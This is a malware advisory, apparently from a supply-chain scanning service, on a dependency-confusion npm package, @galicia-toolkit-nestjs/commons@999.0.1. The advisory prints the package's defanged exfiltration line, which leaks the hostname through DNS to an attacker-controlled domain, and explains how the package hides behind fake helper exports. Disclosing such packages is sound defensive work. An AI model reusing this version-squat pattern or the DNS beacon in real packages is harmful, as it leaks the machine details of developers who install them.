LWA-2026-12754 confirmed malware

@galicia-toolkit-nestjs/commons@999.0.1

Malicious code in @galicia-toolkit-nestjs/commons (npm)

T1195.002 · Compromise Software Supply ChainT1082 · System Information DiscoveryT1071.004 · DNST1041 · Exfiltration Over C2 Channel

Analysis

@galicia-toolkit-nestjs/commons@999.0.1 is a dependency-confusion / version-squat stub: it publishes a sentinel version (999.0.1) under a scoped name that mimics an internal NestJS toolkit, but ships only a 419-byte index.js. The module exports three no-op NestJS-shaped helpers (version, forRoot, createLogger) as camouflage, then schedules a 5-second timer that reads the victim's hostname via os.hostname() and resolves it as a DNS label under the attacker-controlled domain, i.e. require('dns').resolve(hostname + '.c999[.]dc[.]oob[.]s4yhii[.]com'). This is an out-of-band collection channel: the machine's hostname is exfiltrated in the DNS query itself, with the 'c999' label acting as a campaign/target correlation id, allowing the operator to enumerate which hosts installed the package. The package contains no legitimate functionality, no dependencies, and no lifecycle hooks; the beacon runs whenever the module is required. No credential, token, or file theft was observed — the payload is limited to hostname exfiltration over DNS.

analyzed by
Leitwacht
first seen
Oct 9, 2026, 08:30 AM
analyzed
Oct 9, 2026, 08:31 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.